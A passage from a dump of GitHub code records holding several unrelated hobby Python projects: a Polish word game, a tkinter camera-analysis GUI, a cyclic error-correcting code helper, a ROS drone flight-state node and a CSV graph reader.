[]\n self.word = []\n self.winner = -1\n self.repetition = None\n\n # mode setter\n self.gamemode = True\n\n # gamemode parameters\n self.delay = -1\n self.separator = \"\"\n\n\n def set_testmode_parameters(self):\n self.gamemode = False\n self.set_game_parameters()\n self.set_players(pl_dict_testmode)\n pass\n\n def set_game_parameters(self):\n print(\"Wybierz liczność alfabetu\")\n self.alph_count = pick_int(min=1)\n\n print(\"Wybierz długość słowa\")\n self.word_length = pick_int(min=1)\n\n self.alphabet = generate_alphabet(self.alph_count, base_alphabet)\n\n def set_gamemode_parameters(self):\n self.gamemode = True\n self.set_game_parameters()\n self.set_players(pl_dict_gamemode)\n\n if not isinstance(self.p1, HumanPlayer) or not isinstance(self.p2, HumanPlayer):\n print(\"Wyamagać kliknięcia przed wykonaniem ruchu komputera?\")\n self.delay = pick_option(del_dict)\n\n if self.alph_count > len(base_alphabet):\n self.separator = \"|\"\n else:\n self.separator = \"\"\n\n def set_players(self, pl_dict: dict):\n print(\"Wybierz gracza 1:\")\n self.p1 = pick_option(pl_dict)()\n\n print(\"Wybierz gracza 2:\")\n self.p2 = pick_option(pl_dict)()\n\n def print_parameters(self, end = \"\\n\"):\n print(f\"Parametry gry: \\nLiczność alfabetu: {self.alph_count} | Maks. dł. 
słowa: {self.word_length} | \\nGracz 1: {self.p1.to_string()} | Gracz 2: {self.p2.to_string()}\", end=end)\n\n def play(self):\n self.word = []\n # self.move = 0\n self.log = []\n word_analisys = {}\n self.winner = -1\n\n comp_only = not isinstance(self.p1, HumanPlayer) and not isinstance(self.p2, HumanPlayer)\n\n clear()\n\n while True:\n\n if self.gamemode and not comp_only:\n clear()\n if len(self.word) != 0:\n if self.gamemode:\n if not comp_only:\n print(\"Ruch gracza 1:\")\n if not isinstance(self.p1, HumanPlayer) and self.delay:\n _ = input(\"(enter żeby gracz wykonał ruch)\")\n\n move1 = self.p1.make_move_1(self.word, self.alphabet, word_analisys, self.separator, word_length=self.word_length)\n\n # if self.gamemode:\n # print(ato_word_to_string(word=self.word, marker=move1, sep=self.separator))\n else:\n move1 = 0\n\n self.log.append(move1)\n if self.gamemode and comp_only:\n print(\"Stan gry po ruchu gracza 1: \" + ato_word_to_string(self.word, marker=move1, sep=self.separator))\n time.sleep(0.75)\n\n if self.gamemode:\n if not comp_only:\n clear()\n print(\"Ruch gracza 2:\")\n if not isinstance(self.p2, HumanPlayer) and self.delay:\n _ = input(\"(enter żeby gracz wykonał ruch)\")\n\n move2 = self.p2.make_move_2(self.word, self.alphabet, position=move1, word_analisys=word_analisys, separator=self.separator, word_length=self.word_length)\n\n self.log.append(move2)\n self.word.insert(move1, move2)\n if self.gamemode and comp_only:\n print(\"Stan gry po ruchu gracza 2: \" + ato_word_to_string(self.word, sep=self.separator))\n time.sleep(0.75)\n\n is_rep, self.repetition, word_analisys = analyse_word(self.word)\n\n if len(self.log) > 2 * self.word_length:\n ori = 1\n\n if is_rep:\n self.winner = 1\n break\n elif len(self.word) == self.word_length:\n self.winner = 2\n break\n\n def print_result(self):\n if self.winner == 1:\n print(f\"Gracz 1 wygrywa. W słowie '{ato_word_to_string(self.word, sep=self.separator)}' na miejscu {self.repetition[0]} jest powtórzenie w promieniu {self.repetition[1]}.\")\n else:\n print(f\"Gracz 2 wygrywa. 
Słowo '{ato_word_to_string(self.word, sep=self.separator)}' ma długość {self.word_length} i nie zawiera powtórzeń.\")\n\n print(short_sep)\n print(f\"Kolejne ruchy: {flatten_list_of_strings(self.log, ',')}\")\n","repo_name":"ATruszczynski/gkns_projekt","sub_path":"ato_game.py","file_name":"ato_game.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44337524193","text":"import tkinter as tk\nfrom tkinter import ttk, messagebox\nfrom PIL import Image, ImageTk\nfrom modules.Camera import Camera\nfrom modules.Settings import Settings\nfrom modules.RealTime import RealTime\nfrom modules.MouseCropper import MouseCropper\nfrom modules.TempReader import TempReader\ntemperaturePort = '/dev/ttyACM0'\nimport time\nimport cv2\nimport os\nimport asyncio\nimport threading\nimport matplotlib as mpl\nmpl.use('TkAgg')\nfrom matplotlib import style\nstyle.use('ggplot')\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.backends.backend_tkagg import NavigationToolbar2Tk\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\n\n\n\nclass RealTimeAnalysis(tk.Frame):\n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n settings = Settings.getInstance()\n self.camera = Camera(settings.cameraNumber)\n self.delayOptions = 2000\n self.delay = 18\n self.realTimeList = []\n self.TempReader = TempReader()\n self.current_Temp = 0\n self.do_temp = False\n self.do_graph = False\n\n self.container = tk.Frame(self)\n self.container.grid()\n\n ############ AREA #################\n areaContainer = tk.Frame(self.container)\n areaContainer.grid(row=0, column=0, columnspan=3, sticky='N')\n\n self.label10 = ttk.Label(areaContainer, text='Area Settings', font='Helvetica 10 bold')\n self.label10.grid(row=0, column=0, columnspan=3)\n\n self.scrollbar = ttk.Scrollbar(areaContainer, orient='vertical')\n self.scrollbar.grid(row=1, column=2, sticky='WNS')\n self.listbox = tk.Listbox(areaContainer, selectmode='EXTENDED')\n self.listbox.grid(row=1, column=0, columnspan=3, padx=5, sticky='WE')\n self.listbox.config(yscrollcommand=self.scrollbar.set)\n self.scrollbar.config(command=self.listbox.yview)\n\n self.addareabutton = ttk.Button(areaContainer, text='Add', command=self.addAreaFunc)\n self.addareabutton.grid(row=2, column=0)\n self.deletebutton = ttk.Button(areaContainer, text='Delete', command=self.deleteSelection)\n self.deletebutton.grid(row=2, column=1)\n\n ################ MAKE DATA OPTIONS ###################\n\n self.makeDataContainer = tk.Frame(self.container)\n self.makeDataContainer.grid(row=1, column=0, sticky='N', columnspan=3)\n\n self.label11 = ttk.Label(self.makeDataContainer, text='Make Data Settings', font='Helvetica 10 bold')\n self.label11.grid(row=0, column=0, columnspan=3)\n\n self.label12 = ttk.Label(self.makeDataContainer, text='Making Data Time method: ')\n self.label12.grid(row=1, column=0)\n self.makeDataTimeList = ['Count of Photos', 'Count of Time']\n self.makeDataTimeList.insert(0, self.makeDataTimeList[0])\n self.variable4 = tk.StringVar(self.makeDataContainer)\n self.variable4.set(self.makeDataTimeList[0])\n self.dropdownmenu4 = ttk.OptionMenu(self.makeDataContainer, self.variable4, *self.makeDataTimeList,\n command=self.makeDataTimeMethodInterfaceUpdate)\n self.dropdownmenu4.grid(row=1, column=1, sticky='ew')\n\n self.label13 = ttk.Label(self.makeDataContainer, text='Making Data Photo method: ')\n self.label13.grid(row=2, 
column=0)\n self.makeDataPhotoList = ['Count of Frames']\n self.makeDataPhotoList.insert(0, self.makeDataPhotoList[0])\n self.variable5 = tk.StringVar(self.makeDataContainer)\n self.variable5.set(self.makeDataPhotoList[0])\n self.dropdownmenu5 = ttk.OptionMenu(self.makeDataContainer, self.variable5, *self.makeDataPhotoList, command='')\n self.dropdownmenu5.grid(row=2, column=1, sticky='ew')\n\n self.makeDataFramesContainer = tk.Frame(self.makeDataContainer)\n self.makeDataFramesContainer.grid(row=2, column=2)\n self.makeDataFramesSpinboxVar = tk.StringVar(self.makeDataFramesContainer)\n self.makeDataCountOfFramesSpinbox = tk.Spinbox(self.makeDataFramesContainer, from_=0, to=144,\n textvariable=self.makeDataFramesSpinboxVar,\n width=21, command=self.makeDataUpdateCountOfFrames)\n self.makeDataCountOfFramesSpinbox.grid(row=0, column=0)\n\n ################# START/CANCEL ##################\n self.async_loop = asyncio.get_event_loop()\n startstopContainer = tk.Frame(self.container)\n startstopContainer.grid(row=2, column=0, sticky='N', columnspan=3)\n self.startButton = ttk.Button(startstopContainer, text='Start', command=lambda: self.do_tasks(self.async_loop))\n self.startButton.grid(row=1, column=0)\n self.stopButton = ttk.Button(startstopContainer, text='Cancel', command=self.cancel)\n self.stopButton.grid(row=1, column=1)\n\n ############ RIGHT ###############\n cameraCheckContainer = tk.Frame(self.container)\n cameraCheckContainer.grid(row=0, column=3, rowspan=3)\n\n # ### CAMERA PREVIEW CHECK ###\n # self.checkVar = tk.IntVar()\n # self.checkbutton = tk.Checkbutton(cameraCheckContainer, variable=self.checkVar, text='Camera Preview',\n # command=self.checkClick)\n # self.checkbutton.grid(row=0, column=0, sticky='W')\n #\n # cameraContainer = tk.Frame(cameraCheckContainer)\n # cameraContainer.grid(row=1, column=0, rowspan=2, sticky='N')\n # ### CAMERA PREVIEW ###\n # self.cameraWindow = tk.Canvas(cameraContainer, width=640, height=480)\n # self.cameraWindow.grid(row=0, column=0, columnspan=2)\n\n self.makeClearGraph()\n self.updateAreasFromOptions()\n self.makeDataFramesSetFromOptions()\n #self.update()\n self.makeDataTimeMethodInterfaceUpdate('')\n\n self.createGraphSwitchers()\n self.drawGraph()\n\n\n def temperatureGetter(self):\n self.current_Temp = self.TempReader.readTemp(temperaturePort)\n\n try:\n for i in self.realTimeList:\n i.currentTemp = self.current_Temp\n\n except:\n pass\n\n if self.do_temp:\n self.after(1000, self.temperatureGetter)\n\n def createGraphSwitchers(self):\n try:\n self.switchersContainer.grid_forget()\n except:\n pass\n\n settings = Settings.getInstance()\n self.switchersContainer = tk.Frame(self)\n self.switchersContainer.grid(row=1, column=4, columnspan=2, sticky='N')\n\n self.areasList = []\n\n try:\n for i in range(1, len(settings.areasList)):\n if settings.areasList[i] not in self.areasList:\n self.areasList.append(str(settings.areasList[i]))\n\n\n self.areasList.insert(0, self.areasList[0])\n self.areasListVar = tk.StringVar(self.switchersContainer)\n self.areasListVar.set(self.areasList[0])\n self.areasGraphOptionMenu = ttk.OptionMenu(self.switchersContainer, self.areasListVar, *self.areasList,\n command=self.drawGraph)\n self.areasGraphOptionMenu.grid(row=0, column=0)\n\n except:\n pass\n\n self.xList = ['temperature', 'time']\n self.xList.insert(0, self.xList[0])\n self.xListVar = tk.StringVar(self.switchersContainer)\n self.xListVar.set(self.xList[0])\n\n self.xOptionMenu = ttk.OptionMenu(self.switchersContainer, self.xListVar, *self.xList, 
command=self.drawGraph)\n self.xOptionMenu.grid(row=0, column=1)\n\n def makeClearGraph(self):\n self.f = Figure(figsize=(8, 5), dpi=100)\n self.avg = self.f.add_subplot(111)\n self.Canvas = FigureCanvasTkAgg(self.f, master=self)\n self.Canvas.get_tk_widget().grid(row=0, column=4, columnspan=3)\n self.toolbar_frame = tk.Frame(self)\n self.Toolbar = NavigationToolbar2Tk(self.Canvas, self.toolbar_frame)\n self.Toolbar.update()\n self.toolbar_frame.grid(row=1, column=6)\n\n\n # self.toolbar_frame = tk.Frame(self)\n # self.Myfig = plt.figure()\n # self.Canvas = FigureCanvasTkAgg(self.Myfig, master=self)\n # self.Toolbar = NavigationToolbar2Tk(self.Canvas, self.toolbar_frame)\n # self.Toolbar.update()\n # self.toolbar_frame.grid(row=1, column=4)\n # self.Canvas._tkcanvas.grid(row=0, column=4)\n # self.avg = self.Myfig.add_subplot(111)\n\n def drawGraph(self, *args, **kwargs):\n try:\n area = self.areasListVar.get()[1: len(self.areasListVar.get()) - 1].split(',')\n area = [int(x) for x in area]\n area = tuple(area)\n\n for i in range(len(self.realTimeList)):\n if self.realTimeList[i].area == area:\n xtemp = self.realTimeList[i].tempList\n yred = self.realTimeList[i].avR\n ygreen = self.realTimeList[i].avG\n yblue = self.realTimeList[i].avB\n xtime = self.realTimeList[i].timeList\n\n osx = None\n if self.xListVar.get() == 'temperature':\n osx = xtemp\n xlabel = 'Temperature'\n\n if self.xListVar.get() == 'time':\n xlabel = 'Time'\n timelist = []\n for i in range(len(xtime)):\n #timelist.append(time.strftime(\"%H:%M:%S\", time.gmtime(xtime[i] - xtime[0])))\n timelist.append(xtime[i]-xtime[0])\n osx = timelist\n\n if osx != None:\n self.avg.clear()\n self.avg.plot(osx, yred, \"ro\", osx, ygreen, \"go\", osx, yblue, 'bo')\n self.avg.ticklabel_format(useOffset=False, style='plain')\n plt.ylabel('Average of pixels')\n plt.xlabel(xlabel)\n plt.setp(self.avg.get_xticklabels(), rotation=30, horizontalalignment='right')\n self.Canvas.draw()\n #self.Canvas.refresh()\n\n except:\n print(\"Exception w DrawGraph\")\n pass\n\n if self.do_graph:\n self.after(1000, self.drawGraph)\n\n def checkClick(self):\n if self.checkVar.get() == 0:\n self.checkVar.set(1)\n else:\n self.checkVar.set(0)\n\n def update(self):\n settings = Settings.getInstance()\n if self.checkVar.get():\n ret, frame = self.camera.getFrame()\n if ret:\n for i in range(len(settings.areasList)):\n try:\n cv2.rectangle(frame,\n (settings.areasList[i][0], settings.areasList[i][1]),\n (settings.areasList[i][2], settings.areasList[i][3]),\n (0, 255, 0), 1)\n except:\n pass\n self.img = ImageTk.PhotoImage(master=self.cameraWindow, image=Image.fromarray(frame).resize((640, 480)))\n self.cameraWindow.create_image(0, 0, image=self.img, anchor='nw')\n\n if self.checkVar.get() == 0:\n self.cameraWindow.delete(\"all\")\n\n self.after(self.delay, self.update)\n\n def addAreaFunc(self):\n start = time.time()\n while int(time.time() - start) < 2:\n ret, frame = self.camera.getFrame()\n cv2.imwrite('configure.png', frame)\n\n mouseCropper = MouseCropper()\n mouseCropper.configure('configure.png')\n self.left = mouseCropper.left\n self.upper = mouseCropper.upper\n self.right = mouseCropper.right\n self.lower = mouseCropper.lower\n os.remove('configure.png')\n\n self.listbox.insert('end','{}, {}, {}, {}'.format(self.left, self.upper, self.right, self.lower))\n self.updateSettings()\n\n self.createGraphSwitchers()\n\n def deleteSelection(self):\n items = self.listbox.curselection()\n itemToDel = self.listbox.get(self.listbox.curselection())\n itemToDel = 
tuple(map(int, itemToDel.replace(\" \", \"\").split(',')))\n\n pos = 0\n for i in items:\n idx = int(i) - pos\n self.listbox.delete(idx, idx)\n pos = pos + 1\n\n settings = Settings.getInstance()\n try:\n settings.areasList.remove(itemToDel)\n except:\n pass\n\n def updateAreasFromOptions(self):\n settings = Settings.getInstance()\n for i in range(1,len(settings.areasList)):\n self.listbox.insert('end', '{}, {}, {}, {}'.format(settings.areasList[i][0], settings.areasList[i][1],\n settings.areasList[i][2], settings.areasList[i][3]))\n\n def updateSettings(self):\n settings = Settings.getInstance()\n settings.left = self.left\n settings.upper = self.upper\n settings.right = self.right\n settings.lower = self.lower\n\n if (self.left, self.upper, self.right, self.lower) not in settings.areasList:\n settings.areasList.append((self.left, self.upper, self.right, self.lower))\n\n settings.countOfAreas = len(settings.areasList)\n\n def _asyncio_thread(self, async_loop):\n async_loop.run_until_complete(self.makeData())\n\n def cancel(self):\n for i in self.realTimeList:\n i.do = False\n\n def makingData(self, realTimeObj):\n settings = Settings.getInstance()\n\n if self.variable4.get() == 'Count of Photos':\n realTimeObj.countOfPhoto = int(self.makeDataTimeCountOfPhotosSpinboxVar.get())\n realTimeObj.countOfPhotoDone = 0\n realTimeObj.camera = self.camera\n #realTimeObj.camera = cv2.VideoCapture(settings.cameraNumber)\n realTimeObj.frames = int(self.makeDataFramesSpinboxVar.get())\n realTimeObj.before()\n while realTimeObj.countOfPhotoDone < realTimeObj.countOfPhoto:\n if realTimeObj.do:\n realTimeObj.run()\n realTimeObj.countOfPhotoDone += 1\n else:\n break\n realTimeObj.logFile.close()\n realTimeObj.analysisFile.close()\n\n if self.variable4.get() == 'Count of Time':\n realTimeObj.frames = int(self.makeDataFramesSpinboxVar.get())\n realTimeObj.before()\n\n while realTimeObj.timePast() < realTimeObj.convertTimeToSeconds([int(self.makeDataTimeCountOfTimeHoursSpinboxVar.get()),\n int(self.makeDataTimeCountOfTimeMinutesSpinboxVar.get()),\n int(self.makeDataTimeCountOfTimeSecondsSpinboxVar.get())]):\n if realTimeObj.do:\n realTimeObj.run()\n else:\n break\n realTimeObj.logFile.close()\n realTimeObj.analysisFile.close()\n\n async def makeData(self):\n settings = Settings.getInstance()\n self.do_temp = True\n self.do_graph = True\n self.temperatureGetter()\n self.drawGraph()\n self.countOfProcess = len(settings.areasList) - 1\n threads = []\n for i in range(self.countOfProcess):\n self.realTimeList.append(RealTime(settings.areasList[i + 1]))\n t = threading.Thread(target=self.makingData, args=(self.realTimeList[i],))\n threads.append(t)\n \n time.sleep(1)\n for i in threads:\n i.start()\n\n for i in threads:\n i.join()\n\n self.do_temp = False\n self.do_graph = False\n\n def do_tasks(self, async_loop):\n \"\"\" Button-Event-Handler starting the asyncio part. 
\"\"\"\n threading.Thread(target=self._asyncio_thread, args=(async_loop,)).start()\n\n def makeDataTimeMethodInterfaceUpdate(self, *args, **kwargs):\n if self.variable4.get() == 'Count of Photos':\n try:\n self.makeDataTimeCountOfTimeContainer.grid_forget()\n except:\n pass\n\n self.makeDataTimeCountOfPhotosContainer = tk.Frame(self.makeDataContainer)\n self.makeDataTimeCountOfPhotosContainer.grid(row=1, column=2)\n self.makeDataTimeCountOfPhotosSpinboxVar = tk.StringVar(self.makeDataTimeCountOfPhotosContainer)\n self.makeDataTimeSetFromOptions()\n self.makeDataTimeCountOfPhotosSpinbox = tk.Spinbox(self.makeDataTimeCountOfPhotosContainer, from_=0,\n to=10000,\n textvariable=self.makeDataTimeCountOfPhotosSpinboxVar,\n width=21, command=self.makeDataTimeUpdateCountOfPhoto)\n self.makeDataTimeCountOfPhotosSpinbox.grid(row=0, column=0)\n\n if self.variable4.get() == 'Count of Time':\n try:\n self.makeDataTimeCountOfPhotosContainer.grid_forget()\n except:\n pass\n\n self.makeDataTimeCountOfTimeContainer = tk.Frame(self.makeDataContainer)\n self.makeDataTimeCountOfTimeContainer.grid(row=1, column=2)\n self.makeDataTimeCountOfTimeHoursSpinboxVar = tk.StringVar(self.makeDataTimeCountOfTimeContainer)\n self.makeDataTimeCountOfTimeMinutesSpinboxVar = tk.StringVar(self.makeDataTimeCountOfTimeContainer)\n self.makeDataTimeCountOfTimeSecondsSpinboxVar = tk.StringVar(self.makeDataTimeCountOfTimeContainer)\n self.makeDataTimeSetFromOptions()\n self.makeDataTimeCountOfTimeHoursLabel = ttk.Label(self.makeDataTimeCountOfTimeContainer, text='h')\n self.makeDataTimeCountOfTimeHoursLabel.grid(row=0, column=1)\n self.makeDataTimeCountOfTimeHoursSpinbox = tk.Spinbox(self.makeDataTimeCountOfTimeContainer, from_=0, to=12,\n textvariable=self.makeDataTimeCountOfTimeHoursSpinboxVar,\n width=5, command=self.makeDataTimeUpdateCountOfTimeH)\n self.makeDataTimeCountOfTimeHoursSpinbox.grid(row=0, column=0)\n self.makeDataTimeCountOfTimeMinutesLabel = ttk.Label(self.makeDataTimeCountOfTimeContainer, text='m')\n self.makeDataTimeCountOfTimeMinutesLabel.grid(row=0, column=3)\n self.makeDataTimeCountOfTimeMinutesSpinbox = tk.Spinbox(self.makeDataTimeCountOfTimeContainer, from_=0,\n to=59, textvariable=self.makeDataTimeCountOfTimeMinutesSpinboxVar,\n width=5, command=self.makeDataTimeUpdateCountOfTimeM)\n self.makeDataTimeCountOfTimeMinutesSpinbox.grid(row=0, column=2)\n self.makeDataTimeCountOfTimeSecondsLabel = tk.Label(self.makeDataTimeCountOfTimeContainer, text='s')\n self.makeDataTimeCountOfTimeSecondsLabel.grid(row=0, column=5)\n self.makeDataTimeCountOfTimeSecondsSpinbox = tk.Spinbox(self.makeDataTimeCountOfTimeContainer, from_=0, to=59,\n textvariable=self.makeDataTimeCountOfTimeSecondsSpinboxVar,\n width=5, command=self.makeDataTimeUpdateCountOfTimeS)\n self.makeDataTimeCountOfTimeSecondsSpinbox.grid(row=0, column=4)\n\n def updateMakeDataSettings(self):\n self.makeDataUpdateCountOfFrames()\n\n if self.variable4.get() == 'Count of Photos':\n self.makeDataTimeUpdateCountOfPhoto()\n\n if self.variable4.get() == 'Count of Time':\n self.makeDataTimeUpdateCountOfTimeH()\n self.makeDataTimeUpdateCountOfTimeM()\n self.makeDataTimeUpdateCountOfTimeS()\n\n def updateOptions(self):\n self.updateMakeDataSettings()\n\n self.after(self.delayOptions, self.updateOptions)\n\n def makeDataFramesSetFromOptions(self):\n settings = Settings.getInstance()\n if settings.countOfFrames != None:\n self.makeDataFramesSpinboxVar.set(str(settings.countOfFrames))\n\n def makeDataUpdateCountOfFrames(self):\n settings = Settings.getInstance()\n 
settings.countOfFrames = int(self.makeDataFramesSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfPhoto(self):\n settings = Settings.getInstance()\n settings.countOfPhoto = int(self.makeDataTimeCountOfPhotosSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfTimeH(self):\n settings = Settings.getInstance()\n settings.countOfTimeH = int(self.makeDataTimeCountOfTimeHoursSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfTimeM(self):\n settings = Settings.getInstance()\n settings.countOfTimeM = int(self.makeDataTimeCountOfTimeMinutesSpinboxVar.get())\n\n def makeDataTimeUpdateCountOfTimeS(self):\n settings = Settings.getInstance()\n settings.countOfTimeS = int(self.makeDataTimeCountOfTimeSecondsSpinboxVar.get())\n\n def makeDataTimeSetFromOptions(self):\n settings = Settings.getInstance()\n\n if self.variable4.get() == 'Count of Photos':\n if settings.countOfPhoto != None:\n self.makeDataTimeCountOfPhotosSpinboxVar.set(str(settings.countOfPhoto))\n\n if self.variable4.get() == 'Count of Time':\n if settings.countOfTimeH != None:\n self.makeDataTimeCountOfTimeHoursSpinboxVar.set(str(settings.countOfTimeH))\n if settings.countOfTimeM != None:\n self.makeDataTimeCountOfTimeMinutesSpinboxVar.set(str(settings.countOfTimeM))\n if settings.countOfTimeS != None:\n self.makeDataTimeCountOfTimeSecondsSpinboxVar.set(str(settings.countOfTimeS))\n","repo_name":"iamn0x/Basic-Vid-Analyzer","sub_path":"views/realtimeanalysis.py","file_name":"realtimeanalysis.py","file_ext":"py","file_size_in_byte":22079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19511266805","text":"from sk_dsp_comm import fec_block as block\nimport commpy.channelcoding as cg\nfrom genpoly import cyclic_code_genpoly\nimport numpy as np\n\n# https://pysdr.org/content/channel_coding.html\n\nclass GestionErreur:\n def __init__(self, k, n):\n # fec_block.FECCyclic()\n self.k = k\n self.n = n\n pass\n\n def genpoly(self):\n # init code gestion erreur (1101)\n genpoly = format(cyclic_code_genpoly(self.n, self.k)[0], 'b')\n\n return genpoly, block.FECCyclic(genpoly)\n\n def codageCanal(self, matrice, fec_cyclic):\n n_ligne_matrice = len(matrice)\n matrice = np.reshape(matrice, np.size(matrice)).astype(int)\n codewords = fec_cyclic.cyclic_encoder(matrice)\n matrice = np.reshape(codewords, (n_ligne_matrice, self.n))\n\n return matrice\n\n def decodageCanal(self,matrice,fec_cyclic):\n n_ligne_matrice = len(matrice)\n matrice = np.reshape(matrice, np.size(matrice))\n decoded_message = fec_cyclic.cyclic_decoder(matrice)\n return np.reshape(decoded_message, (n_ligne_matrice, self.k))\n\n def tauxErreur(self,phrase_sans_erreur,phrase_erreur):\n tauxDErreur = {\"%erreur\":0,\"%ressemblance\":0}\n phrase_sans_erreur = phrase_sans_erreur[:100]\n phrase_erreur = phrase_erreur[:100]\n for i in range(len(phrase_sans_erreur)):\n if phrase_sans_erreur[i] == phrase_erreur[i]:\n # pas d'erreur\n tauxDErreur[\"%ressemblance\"] += 1\n else:\n tauxDErreur[\"%erreur\"] += 1\n tauxDErreur[\"%ressemblance\"] /= len(phrase_sans_erreur)\n tauxDErreur[\"%erreur\"] /= len(phrase_sans_erreur)\n return tauxDErreur\n\nif __name__ == '__main__':\n k = 57\n n = 63\n genpoly = format(cyclic_code_genpoly(n, k)[0], 'b')\n print(genpoly)\n","repo_name":"tellebma/tp-codage-CPE","sub_path":"gestionErreur.py","file_name":"gestionErreur.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"20142131082","text":"#!/usr/bin/env python\n\nimport rospy, mavros\nimport math\nfrom mavros_msgs.srv import CommandBool, SetMode\nfrom mavros_msgs.msg import State\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import PoseStamped, TwistStamped\nfrom custom_msgs.msg import StateMachine\n\nflight_state = None\ncurrent_state = None\ncurrent_pos = None\ndestination_pos = None\n\ndef callback(data):\n\t\n\tglobal flight_state\n\tflight_state = data.flight\n\t# print(str(flight_state))\n\ndef getCurrentState(data):\n\n\tglobal current_state\n\tcurrent_state = data\n\ndef getCurrentPosition(data):\n\n\tglobal current_pos\n\tcurrent_pos = data\n\t\ndef getDestination(data):\n\tglobal destination\n\tdestination = data\n\ndef flightCallback(data):\n\tglobal destination\n\tdestination = data\n\tlocal_pos_pub.publish(data)\n\nif __name__=='__main__':\n\n\trospy.init_node('flight_node', anonymous=True)\n\n\trospy.Subscriber(\"/state_machine/state\", StateMachine, callback)\n\trospy.Subscriber(\"/mavros/state\", State, getCurrentState)\n\trospy.Subscriber('/mavros/local_position/odom', Odometry, getCurrentPosition)\n\t\n\tlocal_pos_pub = rospy.Publisher(\"/mavros/setpoint_position/local\", PoseStamped, queue_size=100)\n\tstate_pub = rospy.Publisher('/state_machine/state', StateMachine, queue_size=100)\n\t\n\t#service proxies for arming and setting mode\n\tarmCommandSrv = rospy.ServiceProxy(\"/mavros/cmd/arming\", CommandBool)\n\tsetModeSrv = rospy.ServiceProxy(\"/mavros/set_mode\", SetMode) #http://wiki.ros.org/mavros/CustomModes\n\n\t#msgs sent at 60hz\n\trate = rospy.Rate(60)\n\n\n\t#StateMachine msg that will switch Lakitu to 'hover' state\n\tstate = StateMachine()\n\tstate.preflight = False\n\tstate.takeoff = False\n\tstate.flight = False\n\tstate.hover = True\n\tstate.land = False\n\tstate.emergency = False\n\tstate.manual = False\n\n\tdestination = PoseStamped()\n\tdestination.pose.position.x = 0\n\tdestination.pose.position.y = 0\n\tdestination.pose.position.z = 0\n\n\t# last_request = rospy.Time.now()\n\n\t# flag = True\n\t#main loop of program\n\twhile not rospy.is_shutdown():\n\n\t\tif(flight_state is None):\n\t\t\tcontinue\n\t\tif(current_state is None):\n\t\t\tcontinue\n\t\tif(current_pos is None):\n\t\t\tcontinue\t\n\n\t\tif(flight_state):\n\n\t\t\trospy.Subscriber(\"/lakitu/flight_target\", PoseStamped, flightCallback)\n\n\t\t\tif(current_state.mode != \"OFFBOARD\"):\n\t\t\t\tsetModeSrv(0, 'OFFBOARD')\n\t\t\t# local_pos_pub.publish(destination)\t\n\n\n\t\t\t#this block of code causes strange behavior\t\n\t\t\tif(current_pos.pose.pose.position.x >= destination.pose.position.x - float(0.1) )\\\n\t\t\t and (current_pos.pose.pose.position.x <= destination.pose.position.x + float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.y >= destination.pose.position.y - float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.y <= destination.pose.position.y + float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.z >= destination.pose.position.z - float(0.1))\\\n\t\t\t and (current_pos.pose.pose.position.z <= destination.pose.position.z + float(0.1)):\n\t\t\t \tstate_pub.publish(state)\n\t\n\t\trate.sleep()\n","repo_name":"RoboticsClubatUCF/Laki2","sub_path":"catkin_ws/src/laki2_states/src/old/flight.py","file_name":"flight.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"72220156168","text":"import csv\r\nimport os\r\nfrom ..classes import Graph, 
DiGraph\r\n\r\ndef infer_types( row):\r\n types = []\r\n for val in row:\r\n try:\r\n int(val)\r\n types.append(int)\r\n except ValueError:\r\n try:\r\n float(val)\r\n types.append(float)\r\n except ValueError:\r\n types.append(str)\r\n return types\r\n\r\ndef read_csv(path, delimiter=',', directed=False):\r\n\r\n adjacency_list = {}\r\n vertices = {}\r\n\r\n with open(f'{path}/edges.csv', mode='r', newline='') as edges_file:\r\n reader = csv.reader(edges_file, delimiter=delimiter)\r\n header = next(reader)\r\n if len(header) == 2:\r\n for row in reader:\r\n source, target = int(row[0]), int(row[1])\r\n if source not in adjacency_list:\r\n adjacency_list[source] = {target:{}}\r\n else:\r\n adjacency_list[source][target] = {}\r\n if target not in adjacency_list:\r\n adjacency_list[target] = {source:{}}\r\n else:\r\n adjacency_list[target][source] = {}\r\n else:\r\n first_row = next(reader)\r\n attribute_names = header[2:]\r\n attribute_types = infer_types(first_row[2:])\r\n edges_file.seek(0)\r\n header = next(reader)\r\n for row in reader:\r\n source, target = int(row[0]), int(row[1])\r\n attr = {a: t(v) for a, t, v in zip(attribute_names, attribute_types, row[2:])}\r\n if source not in adjacency_list:\r\n adjacency_list[source] = {target:attr}\r\n else:\r\n adjacency_list[source][target] = attr\r\n if target not in adjacency_list:\r\n adjacency_list[target] = {source:attr}\r\n else:\r\n adjacency_list[target][source] = attr\r\n \r\n if os.path.isfile(f'{path}/vertices.csv'):\r\n vertices = {}\r\n with open(f'{path}/vertices.csv', mode='r', newline='') as vertices_file:\r\n reader = csv.reader(vertices_file, delimiter=delimiter)\r\n header = next(reader)\r\n if len(header) == 1:\r\n for row in reader:\r\n vertices[int(row[0])] = {}\r\n else:\r\n first_row = next(reader)\r\n attribute_names = header[1:]\r\n attribute_types = infer_types(first_row[1:])\r\n edges_file.seek(0)\r\n header = next(reader)\r\n for row in reader:\r\n vertex = int(row[0])\r\n attr = {a: t(v) for a, t, v in zip(attribute_names, attribute_types, row[2:])}\r\n vertices[vertex] = attr\r\n else:\r\n vertices = {v: [] for v in adjacency_list}\r\n\r\n return adjacency_list, vertices\r\n\r\ndef write_csv(path, adjacency_list, vertices=None, delimiter=','):\r\n\r\n os.makedirs(path, exist_ok=True)\r\n\r\n with open(f'{path}/edges.csv', mode='r', newline='') as edges_file:\r\n writer = 